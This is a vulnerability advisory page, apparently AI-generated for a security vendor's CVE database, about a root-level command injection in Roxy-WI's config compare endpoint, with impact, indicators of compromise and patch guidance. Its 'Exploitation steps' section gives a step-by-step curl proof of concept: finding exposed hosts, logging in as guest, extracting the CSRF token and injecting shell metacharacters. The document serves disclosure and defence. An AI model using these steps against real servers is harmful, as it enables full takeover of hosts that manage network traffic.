CVE-2026-27811: 
Roxy-WI vulnerability analysis and mitigation

Overview

CVE-2026-27811 is a command injection vulnerability in Roxy-WI, a web interface for managing HAProxy, Nginx, Apache, and Keepalived servers. It affects all versions prior to 8.2.6.3 and allows authenticated users with low privileges to execute arbitrary system commands on the application host. The vulnerability was disclosed on March 17–18, 2026, with a fix released in version 8.2.6.3. It carries a CVSS v3.1 base score of 8.8 (High) (GitHub Advisory).

Technical details

The root cause is improper neutralization of special elements in an OS command (CWE-77, CWE-78), located in app/modules/config/config.py at line 362. The /config/compare/<service>/<server_ip>/show endpoint accepts left and right parameters representing configuration file names, which are directly interpolated into a shell command string: cmd = f"/bin/diff -ub {config_dir}{left} {config_dir}{right}". Because subprocess_execute calls subprocess.Popen with shell=True, an attacker can inject shell metacharacters (e.g., ; id; whoami; #) into the left or right parameters to break out of the intended diff command and execute arbitrary OS commands. The only prerequisite is authentication as any user with access to one of the supported services (haproxy, nginx, apache, keepalived) (GitHub Advisory, Patch Commit).

Impact

Successful exploitation grants an authenticated attacker arbitrary OS command execution on the Roxy-WI application host, which the advisory confirms typically runs as root (uid=0(root)). This results in full system compromise — including complete confidentiality, integrity, and availability loss — and allows the attacker to manipulate HAProxy, Nginx, Apache, and Keepalived configurations, potentially disrupting or redirecting traffic across managed infrastructure. The compromised host could also serve as a pivot point for lateral movement into the broader network (GitHub Advisory).

Exploitability

A complete, curl-based proof-of-concept exploit is publicly available in the GitHub Security Advisory, demonstrating authenticated RCE including login, CSRF token extraction, and command injection payload execution (GitHub Advisory). The EPSS score is approximately 0.0104 (~1%), and there is no current evidence of in-the-wild exploitation or CISA KEV catalog listing. No specific threat actor attribution has been reported. The low privilege requirement and network-accessible attack vector make this straightforward to exploit for any authenticated user.

Exploitation steps

  1. Reconnaissance: Identify internet-facing Roxy-WI instances (versions < 8.2.6.3) using Shodan, Censys, or similar tools by searching for the Roxy-WI web interface.
  2. Authenticate: Log in with any valid low-privilege account that has access to at least one managed service (haproxy, nginx, apache, or keepalived):
    curl -s -k -c session -X POST "http://TARGET/login" -H 'Content-Type: application/json' -d '{"login": "guest", "pass": "guest"}'
  3. Extract CSRF token: Parse the session cookie file to retrieve the CSRF token:
    CSRF=$(grep csrf session | awk '{print $7}')
  4. Inject OS command: Send a crafted POST request to the vulnerable endpoint with shell metacharacters in the left parameter:
    curl -s -k -b session -X POST "http://TARGET/config/compare/haproxy/x/show" \
      -H "X-CSRF-TOKEN: $CSRF" \
      -H 'Content-Type: application/json' \
      -d '{"left": "; id; whoami; #", "right": ""}'
  5. Achieve RCE: The server executes the injected commands as root and returns the output in the JSON response (e.g., {"compare":"uid=0(root) gid=0(root) groups=0(root)\nroot"}), confirming full command execution (GitHub Advisory).

Indicators of compromise

  • Network: Unexpected POST requests to /config/compare/<service>/<server_ip>/show containing shell metacharacters (;, |, &, #) in the JSON body left or right fields; outbound connections from the Roxy-WI host to unknown external IPs following such requests.
  • Logs: Web server access logs showing POST requests to /config/compare/*/show with anomalous or encoded payloads in the request body; application logs reflecting unexpected command output or errors from diff_config.
  • Process: Unusual child processes spawned by the Roxy-WI Python/Flask process (e.g., id, whoami, bash, curl, wget, python) visible via process monitoring tools like ps or auditd.
  • File System: New or modified files in the Roxy-WI installation directory, unexpected cron jobs, or new user accounts created by the application process user (GitHub Advisory).

Mitigation and workarounds

Upgrade Roxy-WI to version 8.2.6.3 or later, which adds a check blocking .. in input values and wraps the compare logic in exception handling (Release v8.2.6.3, Patch Commit). As a workaround prior to patching, restrict network access to the Roxy-WI web interface to trusted administrators only using firewall rules or network segmentation. The advisory also recommends using shlex.quote to escape arguments and replacing subprocess.Popen(shell=True) calls with list-based argument passing to prevent shell injection (GitHub Advisory).

Community reactions

The vulnerability was reported by researcher flocto and published via GitHub's security advisory program. Social media activity includes posts on Infosec.Exchange and Bluesky referencing the CVE, and coverage appeared on threat intelligence aggregators such as The Hacker Wire and Yazoul. No major vendor statements or significant mainstream media coverage have been identified beyond the GitHub advisory and automated CVE feeds.

Additional resources


Source: This report was generated using AI

Related Roxy-WI vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-45564HIGH8.8
  • Roxy-WI logoRoxy-WI
  • cpe:2.3:a:roxy-wi:roxy-wi
NoYesJun 10, 2026
CVE-2026-45567HIGH8.3
  • Roxy-WI logoRoxy-WI
  • cpe:2.3:a:roxy-wi:roxy-wi
NoYesJun 10, 2026
CVE-2026-45569HIGH8.1
  • Roxy-WI logoRoxy-WI
  • cpe:2.3:a:roxy-wi:roxy-wi
NoYesJun 10, 2026
CVE-2026-45565HIGH8.1
  • Roxy-WI logoRoxy-WI
  • cpe:2.3:a:roxy-wi:roxy-wi
NoYesJun 10, 2026
CVE-2026-45566MEDIUM6.1
  • Roxy-WI logoRoxy-WI
  • cpe:2.3:a:roxy-wi:roxy-wi
NoYesJun 10, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management